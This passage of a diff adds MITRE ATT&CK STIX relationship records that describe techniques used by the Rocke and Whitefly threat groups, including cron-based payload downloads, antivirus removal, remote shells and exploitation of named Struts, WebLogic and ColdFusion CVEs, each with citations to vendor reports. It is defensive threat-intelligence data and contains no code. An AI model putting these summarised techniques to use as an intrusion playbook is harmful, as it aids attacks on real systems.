+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has installed an \"init.d\" startup script to maintain persistence.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6b1cc49f-8d94-4f59-a723-2a70c3edf760",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.425Z",
+ "created": "2020-05-26T16:17:59.430Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has changed the time stamp of certain files.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--ff14431c-bf82-44be-b12a-a65e88d5347a",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.473Z",
+ "created": "2020-05-26T16:17:59.473Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has changed file permissions of files so they could not be modified.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a2f88508-4177-4294-b287-6a3494f6e738",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.476Z",
+ "created": "2020-05-26T16:17:59.476Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) can detect a running process's PID on the infected machine.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a3d2ef4a-2bca-482d-897b-99da14b16b52",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.484Z",
+ "created": "2020-05-26T16:17:59.484Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has deleted files on infected machines.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--dec705fd-139b-49d6-b0d8-888b2b922a12",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.535Z",
+ "created": "2020-05-26T16:17:59.535Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--674031ea-4fff-4669-b44b-d289fa1cc36e",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.535Z",
+ "created": "2020-05-26T16:17:59.542Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106)'s miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--78fc38f6-88ee-4f26-84e1-7532d95a4fbe",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.538Z",
+ "created": "2020-05-26T16:17:59.550Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106)'s miner, \"TermsHost.exe\", evaded defenses by injecting itself into Windows processes, including Notepad.exe.(Citation: Talos Rocke August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--5de38b67-dbc7-46bf-bb73-91cd0e069d05",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.556Z",
+ "created": "2020-05-26T16:17:59.556Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106)'s miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a1956344-1a2d-4193-bb20-0f65c98776fe",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.592Z",
+ "created": "2020-05-26T16:17:59.607Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has looked for IP addresses in the known_hosts file on the infected system and attempted to SSH into them.(Citation: Talos Rocke August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--beae1b73-f369-4443-8e59-eb9e99665e8d",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.583Z",
+ "created": "2020-05-26T16:17:59.610Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) downloaded a file \"libprocesshider\", which could hide files on the target system.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--48141016-3fc6-46af-9f93-b52439ed78ea",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.620Z",
+ "created": "2020-05-26T16:17:59.620Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ca1afca5-2f16-497e-bfff-1564706e05f2",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.626Z",
+ "created": "2020-05-26T16:17:59.626Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ffb03265-d9d6-4dc7-ba8e-71498be4e131",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.670Z",
+ "created": "2020-05-26T16:17:59.670Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.(Citation: Talos Rocke August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--30d1528d-6a50-47b2-ab5c-eb9074adc716",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.631Z",
+ "created": "2020-05-26T16:17:59.674Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers.(Citation: Talos Rocke August 2018)(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5d8e9a49-f534-4cb6-9e3e-aebacb3c1dd0",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.620Z",
+ "created": "2020-05-26T16:17:59.683Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has executed wget and curl commands to Pastebin over the HTTPS protocol.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e8095f70-12de-4330-a293-25c4b4f22ffc",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.567Z",
+ "created": "2020-05-26T16:17:59.685Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) installed a cron job that downloaded and executed files from the C2.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--49a68076-c596-412d-a8af-3e238dfef960",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.687Z",
+ "created": "2020-05-26T16:17:59.687Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.(Citation: Talos Rocke August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--31e01486-8827-41cd-a21b-dc420554d1bb",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.747Z",
+ "created": "2020-05-26T16:17:59.747Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) used malware to download additional malicious files to the target system.(Citation: Talos Rocke August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--3e039f64-08da-4bb3-b8d5-1ed6428980ac",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.750Z",
+ "created": "2020-05-26T16:17:59.750Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--06508c23-746d-4894-b414-cff925692bd5",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.751Z",
+ "created": "2020-05-26T16:17:59.751Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has distributed cryptomining malware.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--46c37037-00da-4cf5-bde1-4296e10e6483",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.753Z",
+ "created": "2020-05-26T16:17:59.753Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has used a simple remote shell tool that will call back to the C2 server and wait for commands.(Citation: Symantec Whitefly March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--92b00f56-c9ac-4e48-9890-40b78ab0c361",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.930Z",
+ "created": "2020-05-26T17:14:42.930Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has used an open-source tool to exploit a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers.(Citation: Symantec Whitefly March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--76681016-c8a2-4dcf-bac5-4a58749f326d",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.955Z",
+ "created": "2020-05-26T17:14:42.955Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has used malicious .exe or .dll files disguised as documents or images.(Citation: Symantec Whitefly March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--983bd6cd-907a-430d-a6ec-0ca024ca87ae",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.958Z",
+ "created": "2020-05-26T17:14:42.958Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has the ability to download additional tools from the C2.(Citation: Symantec Whitefly March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1898925b-236a-4847-8a97-e934c07cdde1",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.959Z",
+ "created": "2020-05-26T17:14:42.959Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
